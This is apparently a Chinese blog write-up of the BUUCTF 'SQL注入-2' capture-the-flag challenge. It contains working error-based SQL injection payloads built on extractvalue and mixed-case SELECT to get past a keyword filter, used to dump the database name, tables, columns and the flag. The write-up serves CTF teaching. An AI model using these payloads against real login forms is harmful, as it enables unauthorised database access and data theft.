提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
题目
BUUCTF的[第一章 web入门]SQL注入-2
一、收集信息
提示:
请访问 /login.php和 /user.php
1.访问/login.php
源代码中提示:
<!-- 如果觉得太难了,可以在url后加入?tips=1 开启mysql错误提示,使用burp发包就可以看到啦-->
2.访问/user.php
无信息
二、进行注入
在/login.php后面添加?tips=1
提交用户名、密码(随便输入),进行抓包
使用报错注入、select被过滤
1)报错注入
extractvalue
updatexml
2)爆数据库名
name=1'and extractvalue(1,concat(0x7e,(SeLeCt(database()))))%23&pass=1
3)爆表名
name=1'and extractvalue(1,concat(0x7e,(SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema)like('note'))))%23&pass=1
4)爆字段
name=1'and extractvalue(1,concat(0x7e,(SelEct(group_concat(column_name))from(information_schema.columns)where(table_name)like('fl4g'))))%23&pass=1
5)爆数据
name=1'and extractvalue(1,concat(0x7e,(SeLect(flag)from(note.fl4g))))%23&pass=1
版权声明:本文为qq_43618536原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。